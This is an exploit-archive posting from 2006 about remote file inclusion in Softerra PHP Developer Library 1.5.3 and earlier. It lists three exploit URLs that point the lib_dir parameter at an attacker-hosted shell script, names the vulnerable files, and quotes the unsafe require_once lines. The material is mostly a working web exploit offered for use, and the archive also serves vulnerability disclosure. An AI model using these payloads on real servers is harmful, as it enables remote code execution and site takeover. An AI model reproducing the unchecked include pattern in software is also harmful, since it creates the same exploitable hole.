Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities
# Published : 2006-10-12
# Author : MP
# Previous Title : Download-Engine <= 1.4.2 (spaw) Remote File Include Vulnerability
# Next Title : phpBB Journals System Mod 1.0.2 [RC2] Remote File Include Exploit

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Softerra. PHP Developer Library ]                 #
#                                                                
# Class:     Remote File Include Vulnerability                  #
# Patch:     Unavailable                                        #
# Published  2006/10/12                                         #
# Remote:    Yes                                                
# Local:     No                            			#
# Type:      High                                               #
# Site:      http://www.softerra.com/products_php-library.htm   #
# Author:    MP
# Contact:   mp01010@yahoo.com                    		#
#                                				#
#################################################################

Exploit:

http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/registry.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlcompose.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlsearch.lib.php?lib_dir=http://attacker.com/shell?


Vuln Files:

registry.lib.php
sqlcompose.lib.php
sqlsearch.lib.php


Vuln Code:
#
../lib/registry.lib.php

<? ...
require_once ($lib_dir . "sqlstorage.class.php");
... ?>
##
../lib/sqlcompose.lib.php

<? ...
require_once ($lib_dir . "array.lib.php");
... ?>

##
../lib/sqlsearch.lib.php

<? ...
require_once ($lib_dir . "array.lib.php");
... ?>

# www.Syue.com [2006-10-12]